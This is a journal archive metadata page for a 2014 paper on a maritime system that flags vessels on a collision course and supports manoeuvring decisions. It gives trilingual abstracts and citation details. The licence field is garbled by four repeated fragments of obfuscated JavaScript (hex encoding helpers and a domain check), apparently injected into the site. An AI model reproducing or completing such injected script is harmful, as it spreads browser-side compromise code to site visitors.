THE EVALUATION SYSTEM OF MOVING OBJECTS’ CLOSE-QUARTERS SITUATION
Наукові журнали Національного Авіаційного Університету
View Archive InfoField | Value | |
Title |
THE EVALUATION SYSTEM OF MOVING OBJECTS’ CLOSE-QUARTERS SITUATION
Система оценки чрезмерного сближения подвижных объектов Система оцінки надмірного наближення рухомих об’єктів |
|
Creator |
Mamontov, Volodymyr; National Maritime Academy, Odessa, Ukraine
|
|
Subject |
—
decision-making; excessive convergence; navigation devices; prevent crashes 656.61.052 — навигационные устройства; предупреждение аварий; принятие решения; чрезмерное сближение 656.61.052 — навігаційні пристрої; надмірне зближення; попередження аварій; прийняття рішення 656.61.052 |
|
Description |
This work reflects synthesis of the evaluation system of moving objects’ close-quarters situation and support of decision making on maneuvering for prevention of collision.A method of reducing the load on navigation devices calculators was suggested. This method offers to remove those vessels from processing that are moving away from own ship. This method creates the preconditions for reducing data downloading to operator controlling vessel’s movement process. Getting data in such a way ready for decision-making allows operator to give commands directly during the process of controlling that leads to confident actions and reduces the likelihood of collision. The results can be used in maritime training institutions, refresher and update training for navigators and while pilotage.
Выполнен синтез системы оценки избыточного сближения судов и поддержки принятия решения по маневрированию для предупреждения аварийного события. Предложен способ уменьшения загрузки вычислителей навигационных устройств путем снятия из обработки судов, которые отдаляются от собственного судна. Показано, что этот способ создает предпосылки для уменьшения информационной загрузки оператора, управляющего процессом движения. Отмечено, что получение данных в виде, готовом для принятия решения, позволяет оператору отдавать команды непосредственно при управлении, что уменьшает вероятность возникновения аварийных происшествий. Виконано синтез системи оцінки надмірного зближення суден та підтримки прийняття рішення по маневруванню для попередження аварійної події. Запропоновано спосіб зменшення завантаження обчислювачів навігаційних пристроїв шляхом зняття з обробки суден, які віддаляються від власного судна. Показано, що цей спосіб створює передумови для зменшення інформаційного завантаження оператора, керуючого процесом руху. Відзначено, що отримання даних у вигляді, готовому для прийняття рішення, дозволяє оператору віддавати команди безпосередньо під час керування, що зменшує ймовірність виникнення аварійних подій. |
|
Publisher |
National Aviation University
|
|
Contributor |
—
— — |
|
Date |
2014-07-04
|
|
Type |
—
— — |
|
Format |
application/pdf
application/pdf application/pdf |
|
Identifier |
http://jrnl.nau.edu.ua/index.php/visnik/article/view/6776
10.18372/2306-1472.59.6776 |
|
Source |
Proceedings of the National Aviation University; Том 59, № 2 (2014); 61-67
Вестник Национального авиационного университета; Том 59, № 2 (2014); 61-67 Вісник Національного Авіаційного Університету; Том 59, № 2 (2014); 61-67 |
|
Language |
uk
|
|
Rights |
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e |
|